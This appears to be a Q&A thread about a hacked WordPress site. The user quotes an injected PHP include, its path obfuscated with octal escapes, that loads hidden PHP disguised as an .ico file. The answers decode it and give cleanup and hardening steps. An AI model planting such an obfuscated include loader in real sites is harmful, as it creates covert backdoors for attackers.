Krishna Sunuwar
Krishna Sunuwar

Reputation: 2947

Wordpress site hacked?

It looks like my wordpress site has been hacked. Following code snipt was in index.php, wp-config.php

<?php
/*6b9bb*/

@include "\057ho\155e/\151nt\145r7\0602/\160ub\154ic\137ht\155l/\167p-\151nc\154ud\145s/\152s/\164in\171mc\145/.\146b4\063d6\0700.\151co";

/*6b9bb*/

I have changed:

  1. WP Admin URL and put strong password username
  2. changed cpanel/FTP password with strong one
  3. Implemented iTheme Security
  4. Updated Wordpress to latest (themes and plugins)

However, the code again repeated. What can be good solutions?

p.s. I am using siteground.

Thanks

Upvotes: 2

Views: 4120

Answers (3)

user14905706
user14905706

Reputation:

I faced this problem too, and step by step I did the steps below:

  • Cleaning the injected code, manually
  • Changing all the passwords
  • Hiding the WP admin dashboard URL
  • Limiting the login attempts
  • Installing security plugins (Sucuri, Wordfence security)
  • Contracting with Sucuri plan The good thing is to install Wordfence security plugin, run the scan, then you will detect all the files with the injected code and you can clean the injected code manually. you can also visit this link too https://naderzad.info/web-development/wordpress-code-injection/

Upvotes: 1

Beatroot
Beatroot

Reputation: 476

Once the site is hacked, in my opinion, resistance is futile. No scan or tool will help you. you'll have to replace all files with fresh downloads. mostly it's straight forward:

  • Backup the whole installation (just in case)
    • Download the complete wp-content/uploads folder
    • Make a Screenshot or save the page with the currently active plugins
    • Delete ALL files
    • Get a fresh wordpress setup and extract it
    • Download a fresh copy of your theme and child-theme (recreate the previous setup)
    • Copy the previous wp-config.php to this fresh install. but take a GOOD look at it. usually it also has some virus/backdoors in it. usually easy to see and remove. now you're already connected with your DB
    • Examine the saved uploads folder for files that shouldnt be there, like php files. then upload it to the new folder
    • Reinstall all plugins, fresh downloads

Upvotes: 2

ArtCore7
ArtCore7

Reputation: 133

Yeah someone is including a .ico file (open it with a Text Editor, and you will see it is some php Code and no real ico file)

/home/inter702/public_html/wp-includes/js/tinymce/.fb43d680.ico

Somehow despite your changes of host and passwords you hacker is able to get in, once they are in they can setup all sorts of backdoors to keep access, any .php file of theirs can do this. At the moment closing the initial front-door they use is your sole occupation.

Follow the advice in this article: https://codex.wordpress.org/FAQ_My_site_was_hacked And then: https://codex.wordpress.org/Hardening_WordPress

Here are some links about backdoors: http://smackdown.blogsblogsblogs.com/2008/06/24/how-to-completely-clean-your-hacked-wordpress-installation/ http://smackdown.blogsblogsblogs.com/2012/11/14/hacked-on-hostpapa-or-netregistry/ http://ottopress.com/2009/hacked-wordpress-backdoors/

Source: https://wordpress.org/support/topic/wordpress-hacked-strange-files-appears/

Upvotes: 8

Related Questions